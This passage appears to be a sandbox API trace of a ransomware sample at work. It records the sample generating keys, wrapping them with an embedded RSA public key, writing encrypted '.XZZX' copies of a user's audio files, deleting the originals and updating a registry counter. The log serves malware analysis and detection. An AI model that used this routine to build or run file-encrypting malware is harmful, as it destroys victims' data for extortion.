dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3e60000 [0052.483] SetErrorMode (uMode=0x1) returned 0x1 [0052.483] lstrcpyW (in: lpString1=0x42ce358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0052.483] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x439a2c8) returned 1 [0052.486] CryptGenKey (in: hProv=0x439a2c8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3e288b8) returned 1 [0052.650] CryptExportKey (in: hKey=0x3e288b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x42ce41c | out: pbData=0x0*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0052.650] CryptExportKey (in: hKey=0x3e288b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3e60000, pdwDataLen=0x42ce41c | out: pbData=0x3e60000*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0052.650] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0052.651] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0052.651] CryptDestroyKey (hKey=0x3e288b8) returned 1 [0052.651] CryptReleaseContext (hProv=0x439a2c8, dwFlags=0x0) returned 1 [0052.651] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\A191878831212978B3B60CE1354E0DC0.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\a191878831212978b3b60ce1354e0dc0.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x604 [0052.652] WriteFile (in: hFile=0x604, lpBuffer=0x4385008*, nNumberOfBytesToWrite=0x141a2, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x4385008*, lpNumberOfBytesWritten=0x42ce438*=0x141a2, lpOverlapped=0x0) returned 1 [0052.654] SetFilePointer (in: hFile=0x604, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x141a2 [0052.654] WriteFile (in: hFile=0x604, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0052.654] SetFilePointer (in: hFile=0x604, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x141a7 [0052.654] WriteFile (in: hFile=0x604, lpBuffer=0x42cf860*, nNumberOfBytesToWrite=0x12, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x42cf860*, lpNumberOfBytesWritten=0x42ce438*=0x12, lpOverlapped=0x0) returned 1 [0052.654] SetFilePointer (in: hFile=0x604, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x141b9 [0052.654] WriteFile (in: hFile=0x604, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0052.654] SetFilePointer (in: hFile=0x604, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x141be [0052.654] SetErrorMode (uMode=0x1) returned 0x1 [0052.654] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0052.654] OutputDebugStringW (lpOutputString="end") [0052.654] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----w°I/\x04`Õ,\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0052.654] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x42cdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8 | out: pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8) returned 1 [0052.655] CryptAcquireContextW (in: phProv=0x42cd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x42cd3e4*=0x439a2c8) returned 1 [0052.655] CryptImportPublicKeyInfo (in: hCryptProv=0x439a2c8, dwCertEncodingType=0x1, pInfo=0x42e1710*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x42e1740*, PublicKey.cbData=0x8c, PublicKey.pbData=0x42e1748*, PublicKey.cUnusedBits=0x0), phKey=0x42cd3ec | out: phKey=0x42cd3ec*=0x3e289f8) returned 1 [0052.655] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0052.656] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0052.656] CryptEncrypt (in: hKey=0x3e289f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x42cd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x42cd3f0*=0x80) returned 1 [0052.656] CryptEncrypt (in: hKey=0x3e289f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x439a350*, pdwDataLen=0x42cd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x439a350*, pdwDataLen=0x42cd3e8*=0x80) returned 1 [0052.656] WriteFile (in: hFile=0x604, lpBuffer=0x439a350*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x439a350*, lpNumberOfBytesWritten=0x42ce438*=0x80, lpOverlapped=0x0) returned 1 [0052.656] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0052.656] WriteFile (in: hFile=0x604, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0052.656] GetUserNameW (in: lpBuffer=0x42ce1f8, pcbBuffer=0x42cdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x42cdfe0) returned 1 [0052.657] wsprintfW (in: param_1=0x42cdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0052.657] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe4 | out: phkResult=0x42cdfe4*=0x5f0) returned 0x0 [0052.657] RegQueryValueExW (in: hKey=0x5f0, lpValueName="E1010314", lpReserved=0x0, lpType=0x42cdfd8, lpData=0x42cdfec, lpcbData=0x42cdfdc*=0x4 | out: lpType=0x42cdfd8*=0x4, lpData=0x42cdfec*=0x62, lpcbData=0x42cdfdc*=0x4) returned 0x0 [0052.657] RegCloseKey (hKey=0x5f0) returned 0x0 [0052.657] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe8 | out: phkResult=0x42cdfe8*=0x5f0) returned 0x0 [0052.657] RegSetValueExW (in: hKey=0x5f0, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x42cdfec*=0x63, cbData=0x4 | out: lpData=0x42cdfec*=0x63) returned 0x0 [0052.657] RegCloseKey (hKey=0x5f0) returned 0x0 [0052.657] VirtualFree (lpAddress=0x3e50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0052.658] VirtualFree (lpAddress=0x3e60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0052.658] CloseHandle (hObject=0x604) returned 1 [0052.660] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0052.661] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0052.661] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\JO1Lf.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\jo1lf.m4a")) returned 1 [0052.661] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\JO1Lf.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\jo1lf.m4a")) returned 0 Thread: id = 194 os_tid = 0xab4 [0052.663] lstrcpyA (in: lpString1=0x417fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0052.663] lstrcpyW (in: lpString1=0x417f460, lpString2="oKJQx_NM6hXc.mp3" | out: lpString1="oKJQx_NM6hXc.mp3") returned="oKJQx_NM6hXc.mp3" [0052.663] lstrcpyW (in: lpString1=0x417e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0052.663] SetErrorMode (uMode=0x1) returned 0x1 [0052.663] lstrcpyW (in: lpString1=0x417f860, lpString2="oKJQx_NM6hXc.mp3" | out: lpString1="oKJQx_NM6hXc.mp3") returned="oKJQx_NM6hXc.mp3" [0052.664] CoCreateGuid (in: pguid=0x417e440 | out: pguid=0x417e440*(Data1=0xde80fada, Data2=0xf72e, Data3=0x4c7b, Data4=([0]=0x91, [1]=0x2a, [2]=0x11, [3]=0x7d, [4]=0x80, [5]=0x3, [6]=0xde, [7]=0xef))) returned 0x0 [0052.664] wsprintfW (in: param_1=0x417ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\oKJQx_NM6hXc.mp3") returned 75 [0052.664] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x417fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0052.664] wsprintfW (in: param_1=0x417e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\6D35692C49D86B1ADE80FADA4DF04F62.XZZX") returned 96 [0052.664] StrStrW (lpFirst="oKJQx_NM6hXc.mp3", lpSrch="XZZX") returned 0x0 [0052.664] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\oKJQx_NM6hXc.mp3", dwFileAttributes=0x20) returned 1 [0052.664] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\oKJQx_NM6hXc.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\okjqx_nm6hxc.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x624 [0052.664] ReadFile (in: hFile=0x624, lpBuffer=0x4385008, nNumberOfBytesToRead=0xd7c6, lpNumberOfBytesRead=0x417e418, lpOverlapped=0x0 | out: lpBuffer=0x4385008*, lpNumberOfBytesRead=0x417e418*=0xd7c6, lpOverlapped=0x0) returned 1 [0052.665] CloseHandle (hObject=0x624) returned 1 [0052.665] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e50000 [0052.666] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3e60000 [0052.666] SetErrorMode (uMode=0x1) returned 0x1 [0052.666] lstrcpyW (in: lpString1=0x417e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0052.666] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x439a3d8) returned 1 [0052.669] CryptGenKey (in: hProv=0x439a3d8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3e288b8) returned 1 [0052.765] CryptExportKey (in: hKey=0x3e288b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x417e41c | out: pbData=0x0*, pdwDataLen=0x417e41c*=0x94) returned 1 [0052.765] CryptExportKey (in: hKey=0x3e288b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3e60000, pdwDataLen=0x417e41c | out: pbData=0x3e60000*, pdwDataLen=0x417e41c*=0x94) returned 1 [0052.765] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0052.766] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0052.766] CryptDestroyKey (hKey=0x3e288b8) returned 1 [0052.766] CryptReleaseContext (hProv=0x439a3d8, dwFlags=0x0) returned 1 [0052.766] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\6D35692C49D86B1ADE80FADA4DF04F62.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\6d35692c49d86b1ade80fada4df04f62.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x624 [0052.766] WriteFile (in: hFile=0x624, lpBuffer=0x4385008*, nNumberOfBytesToWrite=0xd7c6, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x4385008*, lpNumberOfBytesWritten=0x417e438*=0xd7c6, lpOverlapped=0x0) returned 1 [0052.767] SetFilePointer (in: hFile=0x624, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xd7c6 [0052.767] WriteFile (in: hFile=0x624, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0052.767] SetFilePointer (in: hFile=0x624, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xd7cb [0052.767] WriteFile (in: hFile=0x624, lpBuffer=0x417f860*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x417f860*, lpNumberOfBytesWritten=0x417e438*=0x20, lpOverlapped=0x0) returned 1 [0052.767] SetFilePointer (in: hFile=0x624, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xd7eb [0052.767] WriteFile (in: hFile=0x624, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0052.768] SetFilePointer (in: hFile=0x624, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xd7f0 [0052.768] SetErrorMode (uMode=0x1) returned 0x1 [0052.768] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0052.768] OutputDebugStringW (lpOutputString="end") [0052.768] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----w°I/\x04`Õ\x17\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0052.768] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x417dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8 | out: pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8) returned 1 [0052.768] CryptAcquireContextW (in: phProv=0x417d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x417d3e4*=0x439a3d8) returned 1 [0052.768] CryptImportPublicKeyInfo (in: hCryptProv=0x439a3d8, dwCertEncodingType=0x1, pInfo=0x42e17e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x42e1810*, PublicKey.cbData=0x8c, PublicKey.pbData=0x42e1818*, PublicKey.cUnusedBits=0x0), phKey=0x417d3ec | out: phKey=0x417d3ec*=0x3e28a38) returned 1 [0052.768] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0052.769] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0052.769] CryptEncrypt (in: hKey=0x3e28a38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x417d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x417d3f0*=0x80) returned 1 [0052.769] CryptEncrypt (in: hKey=0x3e28a38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x439a460*, pdwDataLen=0x417d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x439a460*, pdwDataLen=0x417d3e8*=0x80) returned 1 [0052.769] WriteFile (in: hFile=0x624, lpBuffer=0x439a460*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x439a460*, lpNumberOfBytesWritten=0x417e438*=0x80, lpOverlapped=0x0) returned 1 [0052.769] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0052.769] WriteFile (in: hFile=0x624, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0052.769] GetUserNameW (in: lpBuffer=0x417e1f8, pcbBuffer=0x417dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x417dfe0) returned 1 [0052.769] wsprintfW (in: param_1=0x417dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0052.770] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe4 | out: phkResult=0x417dfe4*=0x5f0) returned 0x0 [0052.770] RegQueryValueExW (in: hKey=0x5f0, lpValueName="E1010314", lpReserved=0x0, lpType=0x417dfd8, lpData=0x417dfec, lpcbData=0x417dfdc*=0x4 | out: lpType=0x417dfd8*=0x4, lpData=0x417dfec*=0x63, lpcbData=0x417dfdc*=0x4) returned 0x0 [0052.770] RegCloseKey (hKey=0x5f0) returned 0x0 [0052.770] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe8 | out: phkResult=0x417dfe8*=0x5f0) returned 0x0 [0052.770] RegSetValueExW (in: hKey=0x5f0, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x417dfec*=0x64, cbData=0x4 | out: lpData=0x417dfec*=0x64) returned 0x0 [0052.770] RegCloseKey (hKey=0x5f0) returned 0x0 [0052.770] VirtualFree (lpAddress=0x3e50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0052.770] VirtualFree (lpAddress=0x3e60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0052.771] CloseHandle (hObject=0x624) returned 1 [0052.772] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0052.772] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0052.772] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\oKJQx_NM6hXc.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\okjqx_nm6hxc.mp3")) returned 1 [0052.773] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\oKJQx_NM6hXc.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\okjqx_nm6hxc.mp3")) returned 0 Thread: id = 195 os_tid = 0xa2c [0052.787] lstrcpyA (in: lpString1=0x417fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0052.787] lstrcpyW (in: lpString1=0x417f460, lpString2="TWlZw1pNzI1gwZW3OH.mp3" | out: lpString1="TWlZw1pNzI1gwZW3OH.mp3") returned="TWlZw1pNzI1gwZW3OH.mp3" [0052.787] lstrcpyW (in: lpString1=0x417e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0052.787] SetErrorMode (uMode=0x1) returned 0x1 [0052.787] lstrcpyW (in: lpString1=0x417f860, lpString2="TWlZw1pNzI1gwZW3OH.mp3" | out: lpString1="TWlZw1pNzI1gwZW3OH.mp3") returned="TWlZw1pNzI1gwZW3OH.mp3" [0052.787] CoCreateGuid (in: pguid=0x417e440 | out: pguid=0x417e440*(Data1=0xc1493ec6, Data2=0xeecd, Data3=0x4211, Data4=([0]=0xa5, [1]=0x68, [2]=0x78, [3]=0xcd, [4]=0x91, [5]=0x2f, [6]=0x5e, [7]=0x53))) returned 0x0 [0052.787] wsprintfW (in: param_1=0x417ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\TWlZw1pNzI1gwZW3OH.mp3") returned 81 [0052.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x417fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0052.787] wsprintfW (in: param_1=0x417e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\E003588E3DA0B59DC1493EC641B899E5.XZZX") returned 96 [0052.787] StrStrW (lpFirst="TWlZw1pNzI1gwZW3OH.mp3", lpSrch="XZZX") returned 0x0 [0052.787] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\TWlZw1pNzI1gwZW3OH.mp3", 